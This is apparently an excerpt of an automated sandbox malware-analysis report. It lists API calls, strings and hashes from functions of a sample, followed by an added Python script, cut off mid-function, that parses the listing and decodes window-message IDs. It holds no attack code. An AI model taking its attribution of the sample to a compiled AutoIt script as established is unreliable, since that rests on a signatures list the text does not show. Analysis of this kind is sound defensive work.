                                                                                                                        • Part of subcall function 004C25DB: GetWindowLongW.USER32(?,000000EB), ref: 004C25EC
                                                                                                                      • GetSysColor.USER32(0000000F), ref: 004C21D3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ColorLongWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 259745315-0
                                                                                                                      • Opcode ID: 1964d75c1c806cb7a6340b3618c023a1b5ab640728a01cf1574265ddc6f9ed4b
                                                                                                                      • Instruction ID: d3bf26cba3bca8a2f4f4d91a1703c8db9ab97717a6ef39f9fa1884570904ba93
                                                                                                                      • Opcode Fuzzy Hash: 1964d75c1c806cb7a6340b3618c023a1b5ab640728a01cf1574265ddc6f9ed4b
                                                                                                                      • Instruction Fuzzy Hash: BE41B339000140DFDB259F28DD48FBA3B65EB16331F1442AAFE618A2E1C7B58C42EB65
                                                                                                                      APIs
                                                                                                                      • CharLowerBuffW.USER32(?,?,0054F910), ref: 0052A90B
                                                                                                                      • GetDriveTypeW.KERNEL32(00000061,005789A0,00000061), ref: 0052A9D5
                                                                                                                      • _wcscpy.LIBCMT ref: 0052A9FF
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharDriveLowerType_wcscpy
                                                                                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                      • API String ID: 2820617543-1000479233
                                                                                                                      • Opcode ID: 4366341f5fbea5f40e3735d985e50461380ee2d022bb50a3045bc041b91a325f
                                                                                                                      • Instruction ID: 462a420cc10ba14399334948be2e873b623657ea11e641bb1ae91a0c18f493ab
                                                                                                                      • Opcode Fuzzy Hash: 4366341f5fbea5f40e3735d985e50461380ee2d022bb50a3045bc041b91a325f
                                                                                                                      • Instruction Fuzzy Hash: 1D51DE35108311ABC700EF16E896AAFBBE5FF95308F00482EF595572E2DB709D89CA53
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __i64tow__itow__swprintf
                                                                                                                      • String ID: %.15g$0x%p$False$True
                                                                                                                      • API String ID: 421087845-2263619337
                                                                                                                      • Opcode ID: ffe3da17fa4f7d88bb8ecc347816811a88f131f7aed8b9e6fd77ade4c8487dc3
                                                                                                                      • Instruction ID: 1933bdb02b8dc36c87b46c9fb5423824b1445215133cb3fe607e15ffa2e8d121
                                                                                                                      • Opcode Fuzzy Hash: ffe3da17fa4f7d88bb8ecc347816811a88f131f7aed8b9e6fd77ade4c8487dc3
                                                                                                                      • Instruction Fuzzy Hash: 55412531510209BBEB24EF35D846E7A73E8BF05304F20486FE549C7282EA799D428B29
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 0054716A
                                                                                                                      • CreateMenu.USER32 ref: 00547185
                                                                                                                      • SetMenu.USER32(?,00000000), ref: 00547194
                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00547221
                                                                                                                      • IsMenu.USER32(?), ref: 00547237
                                                                                                                      • CreatePopupMenu.USER32 ref: 00547241
                                                                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0054726E
                                                                                                                      • DrawMenuBar.USER32 ref: 00547276
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                      • String ID: 0$F
                                                                                                                      • API String ID: 176399719-3044882817
                                                                                                                      • Opcode ID: 85d09ce0a7186b3e0cd6995f3e162c85d558156775d95a706c430e57338e9cc1
                                                                                                                      • Instruction ID: 8c4da982c4093a0c2100d166c4c67d63aae7b1b796905987d308896116a44ad3
                                                                                                                      • Opcode Fuzzy Hash: 85d09ce0a7186b3e0cd6995f3e162c85d558156775d95a706c430e57338e9cc1
                                                                                                                      • Instruction Fuzzy Hash: 1C417578A05209EFDB20DFA8D988EDABBB5FF09304F140529F905A7361D771A914DF90
                                                                                                                      APIs
                                                                                                                      • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0054755E
                                                                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 00547565
                                                                                                                      • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00547578
                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00547580
                                                                                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 0054758B
                                                                                                                      • DeleteDC.GDI32(00000000), ref: 00547594
                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0054759E
                                                                                                                      • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 005475B2
                                                                                                                      • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 005475BE
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                      • String ID: static
                                                                                                                      • API String ID: 2559357485-2160076837
                                                                                                                      • Opcode ID: 61aac56f1ddfc6c39cfe408ffdf8af0086a1509b86222e373c1ebaaf7d6e4155
                                                                                                                      • Instruction ID: f301ba639580bd464652acb3f1da74a0881569b72c3be1f0d6421ec118ca7701
                                                                                                                      • Opcode Fuzzy Hash: 61aac56f1ddfc6c39cfe408ffdf8af0086a1509b86222e373c1ebaaf7d6e4155
                                                                                                                      • Instruction Fuzzy Hash: C3315A36105219AFDF119F68DC08FEA3F69FF1E368F110224FA15A60A0D735D815EBA4
APIs
• _memset.LIBCMT ref: 004E6E3E
  • Part of subcall function 004E8B28: __getptd_noexit.LIBCMT ref: 004E8B28
• __gmtime64_s.LIBCMT ref: 004E6ED7
• __gmtime64_s.LIBCMT ref: 004E6F0D
• __gmtime64_s.LIBCMT ref: 004E6F2A
• __allrem.LIBCMT ref: 004E6F80
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004E6F9C
• __allrem.LIBCMT ref: 004E6FB3
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004E6FD1
• __allrem.LIBCMT ref: 004E6FE8
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004E7006
• __invoke_watson.LIBCMT ref: 004E7077
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
• String ID:
• API String ID: 384356119-0
APIs
• _memset.LIBCMT ref: 00522542
• GetMenuItemInfoW.USER32(00585890,000000FF,00000000,00000030), ref: 005225A3
• SetMenuItemInfoW.USER32(00585890,00000004,00000000,00000030), ref: 005225D9
• Sleep.KERNEL32(000001F4), ref: 005225EB
• GetMenuItemCount.USER32(?), ref: 0052262F
• GetMenuItemID.USER32(?,00000000), ref: 0052264B
• GetMenuItemID.USER32(?,-00000001), ref: 00522675
• GetMenuItemID.USER32(?,?), ref: 005226BA
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00522700
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00522714
• SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00522735
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: ItemMenu$Info$CheckCountRadioSleep_memset
• String ID:
• API String ID: 4176008265-0
APIs
• SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00546FA5
• SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00546FA8
• GetWindowLongW.USER32(?,000000F0), ref: 00546FCC
• _memset.LIBCMT ref: 00546FDD
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00546FEF
• SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00547067
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: MessageSend$LongWindow_memset
• String ID:
• API String ID: 830647256-0
APIs
• SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00516BBF
• SafeArrayAllocData.OLEAUT32(?), ref: 00516C18
• VariantInit.OLEAUT32(?), ref: 00516C2A
• SafeArrayAccessData.OLEAUT32(?,?), ref: 00516C4A
• VariantCopy.OLEAUT32(?,?), ref: 00516C9D
• SafeArrayUnaccessData.OLEAUT32(?), ref: 00516CB1
• VariantClear.OLEAUT32(?), ref: 00516CC6
• SafeArrayDestroyData.OLEAUT32(?), ref: 00516CD3
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00516CDC
• VariantClear.OLEAUT32(?), ref: 00516CEE
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00516CF9
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
• String ID:
• API String ID: 2706829360-0
APIs
  • Part of subcall function 004C9837: __itow.LIBCMT ref: 004C9862
  • Part of subcall function 004C9837: __swprintf.LIBCMT ref: 004C98AC
• CoInitialize.OLE32 ref: 00538403
• CoUninitialize.OLE32 ref: 0053840E
• CoCreateInstance.OLE32(?,00000000,00000017,00552BEC,?), ref: 0053846E
• IIDFromString.OLE32(?,?), ref: 005384E1
• VariantInit.OLEAUT32(?), ref: 0053857B
• VariantClear.OLEAUT32(?), ref: 005385DC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
• String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
• API String ID: 834269672-1287834457
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 00535793
• inet_addr.WSOCK32(?), ref: 005357D8
• gethostbyname.WSOCK32(?), ref: 005357E4
• IcmpCreateFile.IPHLPAPI ref: 005357F2
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00535862
• IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00535878
• IcmpCloseHandle.IPHLPAPI(00000000), ref: 005358ED
• WSACleanup.WSOCK32 ref: 005358F3
Strings
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
• String ID: Ping
• API String ID: 1028309954-2246546115
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0052B4D0
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0052B546
• GetLastError.KERNEL32 ref: 0052B550
• SetErrorMode.KERNEL32(00000000,READY), ref: 0052B5BD
Strings
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: Error$Mode$DiskFreeLastSpace
• String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
• API String ID: 4194297153-14809454
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C7DE1: _memmove.LIBCMT ref: 004C7E22
                                                                                                                        • Part of subcall function 0051AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0051AABC
                                                                                                                      • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00519014
                                                                                                                      • GetDlgCtrlID.USER32 ref: 0051901F
                                                                                                                      • GetParent.USER32 ref: 0051903B
                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 0051903E
                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 00519047
                                                                                                                      • GetParent.USER32(?), ref: 00519063
                                                                                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 00519066
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                      • API String ID: 1536045017-1403004172
                                                                                                                      • Opcode ID: 71bec3cd1839592b5fbe5a3c4c86ad0656a5b4d6bffb039a612038862335361e
                                                                                                                      • Instruction ID: 7e692f0f1d91334ca26702f94825b29f030d7c5b628839f1b7863c1e3c14a018
                                                                                                                      • Opcode Fuzzy Hash: 71bec3cd1839592b5fbe5a3c4c86ad0656a5b4d6bffb039a612038862335361e
                                                                                                                      • Instruction Fuzzy Hash: 8D212878A00108BBDF05EBA4DC99EFEBB74FF59310F00011AF961972A1DB755859EB20
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C7DE1: _memmove.LIBCMT ref: 004C7E22
                                                                                                                        • Part of subcall function 0051AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0051AABC
                                                                                                                      • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 005190FD
                                                                                                                      • GetDlgCtrlID.USER32 ref: 00519108
                                                                                                                      • GetParent.USER32 ref: 00519124
                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00519127
                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 00519130
                                                                                                                      • GetParent.USER32(?), ref: 0051914C
                                                                                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 0051914F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                      • API String ID: 1536045017-1403004172
                                                                                                                      • Opcode ID: 11c16c6c3f9da19e59eb8c9a575d64542bce37c1d39d9297f8032cf6ea50fe39
                                                                                                                      • Instruction ID: 463af151cbd9ff03cd024e308ecf9361c32f79069b7366123ffbb1696ff27fe0
                                                                                                                      • Opcode Fuzzy Hash: 11c16c6c3f9da19e59eb8c9a575d64542bce37c1d39d9297f8032cf6ea50fe39
                                                                                                                      • Instruction Fuzzy Hash: 3621F878A01109BBEF01ABA5DC89EFEBB74FF59300F00401AF911972A1DB755499EB20
                                                                                                                      APIs
                                                                                                                      • GetParent.USER32 ref: 0051916F
                                                                                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00519184
                                                                                                                      • _wcscmp.LIBCMT ref: 00519196
                                                                                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00519211
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                      • API String ID: 1704125052-3381328864
                                                                                                                      • Opcode ID: 2ba694b24d9c5c462cf59fa5af42dd30fee580c4403d86c3a33fa8cf8f39127f
                                                                                                                      • Instruction ID: 5459b8c681be40f897b0e74c5330c29853aa3586560469b84d9ed6a2da446b6c
                                                                                                                      • Opcode Fuzzy Hash: 2ba694b24d9c5c462cf59fa5af42dd30fee580c4403d86c3a33fa8cf8f39127f
                                                                                                                      • Instruction Fuzzy Hash: CF11503E18831779FA112629FC1ADE73F9CFB15724B200027FA14A10D1FEB558916654
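Reading aid for the three SendMessageW-bearing entries above (call sites 00519014, 005190FD and 00519211): an added Python example, not Joe Sandbox code, that parses the "APIs" listing format of this report and decodes the Win32 message IDs passed to SendMessageW. The listing lines embedded below are copied from the entry at 00519014; the message table is the standard winuser.h one, limited to the IDs that occur in this report. The decoded names (LB_SELECTSTRING / LB_SETCURSEL followed by WM_COMMAND to the parent, with the ComboBox/ListBox class-name check) read as generic control-manipulation helpers of a script runtime, which is consistent with the "compiled AutoIt script" signature in the Signatures list rather than with payload behaviour.

```python
"""Parse the 'APIs' lines of a Joe Sandbox function entry and decode the
Win32 message IDs passed to SendMessageW.

Added reading aid, not Joe Sandbox code. REPORT_LINES is copied from the
function entry at 00519014 above; the message table is the standard
winuser.h one, limited to the IDs that occur in this report.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Standard Win32 message IDs (winuser.h) seen in the entries above.
WIN32_MESSAGES = {
    0x0031: "WM_GETFONT",
    0x0111: "WM_COMMAND",
    0x0186: "LB_SETCURSEL",
    0x018C: "LB_SELECTSTRING",
}

# Copied verbatim from the report entry at call site 00519014.
REPORT_LINES = """
  • Part of subcall function 004C7DE1: _memmove.LIBCMT ref: 004C7E22
  • Part of subcall function 0051AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0051AABC
• SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00519014
• GetDlgCtrlID.USER32 ref: 0051901F
• GetParent.USER32 ref: 0051903B
• SendMessageW.USER32(00000000,?,00000111,?), ref: 0051903E
"""

# One listing line: optional "Part of subcall function XXXXXXXX: " prefix,
# then Api.MODULE, an optional "(args)" group, and the call-site address.
API_LINE = re.compile(
    r"(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]{8})"
)


@dataclass
class ApiCall:
    api: str
    module: str
    ref: int                                        # call-site address
    args: List[str] = field(default_factory=list)   # '?' = not resolved by the sandbox
    subcall_of: Optional[int] = None                # callee this line is nested under
    message: Optional[Tuple[int, str]] = None       # (argument slot, message name)


def find_message(args: List[str]) -> Optional[Tuple[int, str]]:
    """Locate a known Win32 message ID among the rendered arguments.

    The sandbox renders arguments from stack slots at the call site, so the
    Msg value is not always in slot 1 (its nominal position for SendMessageW);
    the slot index is returned so the reader can see where it landed.
    """
    for slot, raw in enumerate(args):
        if raw == "?":
            continue
        try:
            value = int(raw, 16)
        except ValueError:
            continue
        if value in WIN32_MESSAGES:
            return slot, WIN32_MESSAGES[value]
    return None


def parse_api_lines(text: str = REPORT_LINES) -> List[ApiCall]:
    """Turn the bullet lines of an 'APIs' block into ApiCall records."""
    calls = []
    for line in text.splitlines():
        line = line.strip().lstrip("• ").strip()
        m = API_LINE.search(line)
        if not m:
            continue
        args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
        call = ApiCall(
            api=m.group("api"),
            module=m.group("module"),
            ref=int(m.group("ref"), 16),
            args=args,
            subcall_of=int(m.group("sub"), 16) if m.group("sub") else None,
        )
        if call.api == "SendMessageW":
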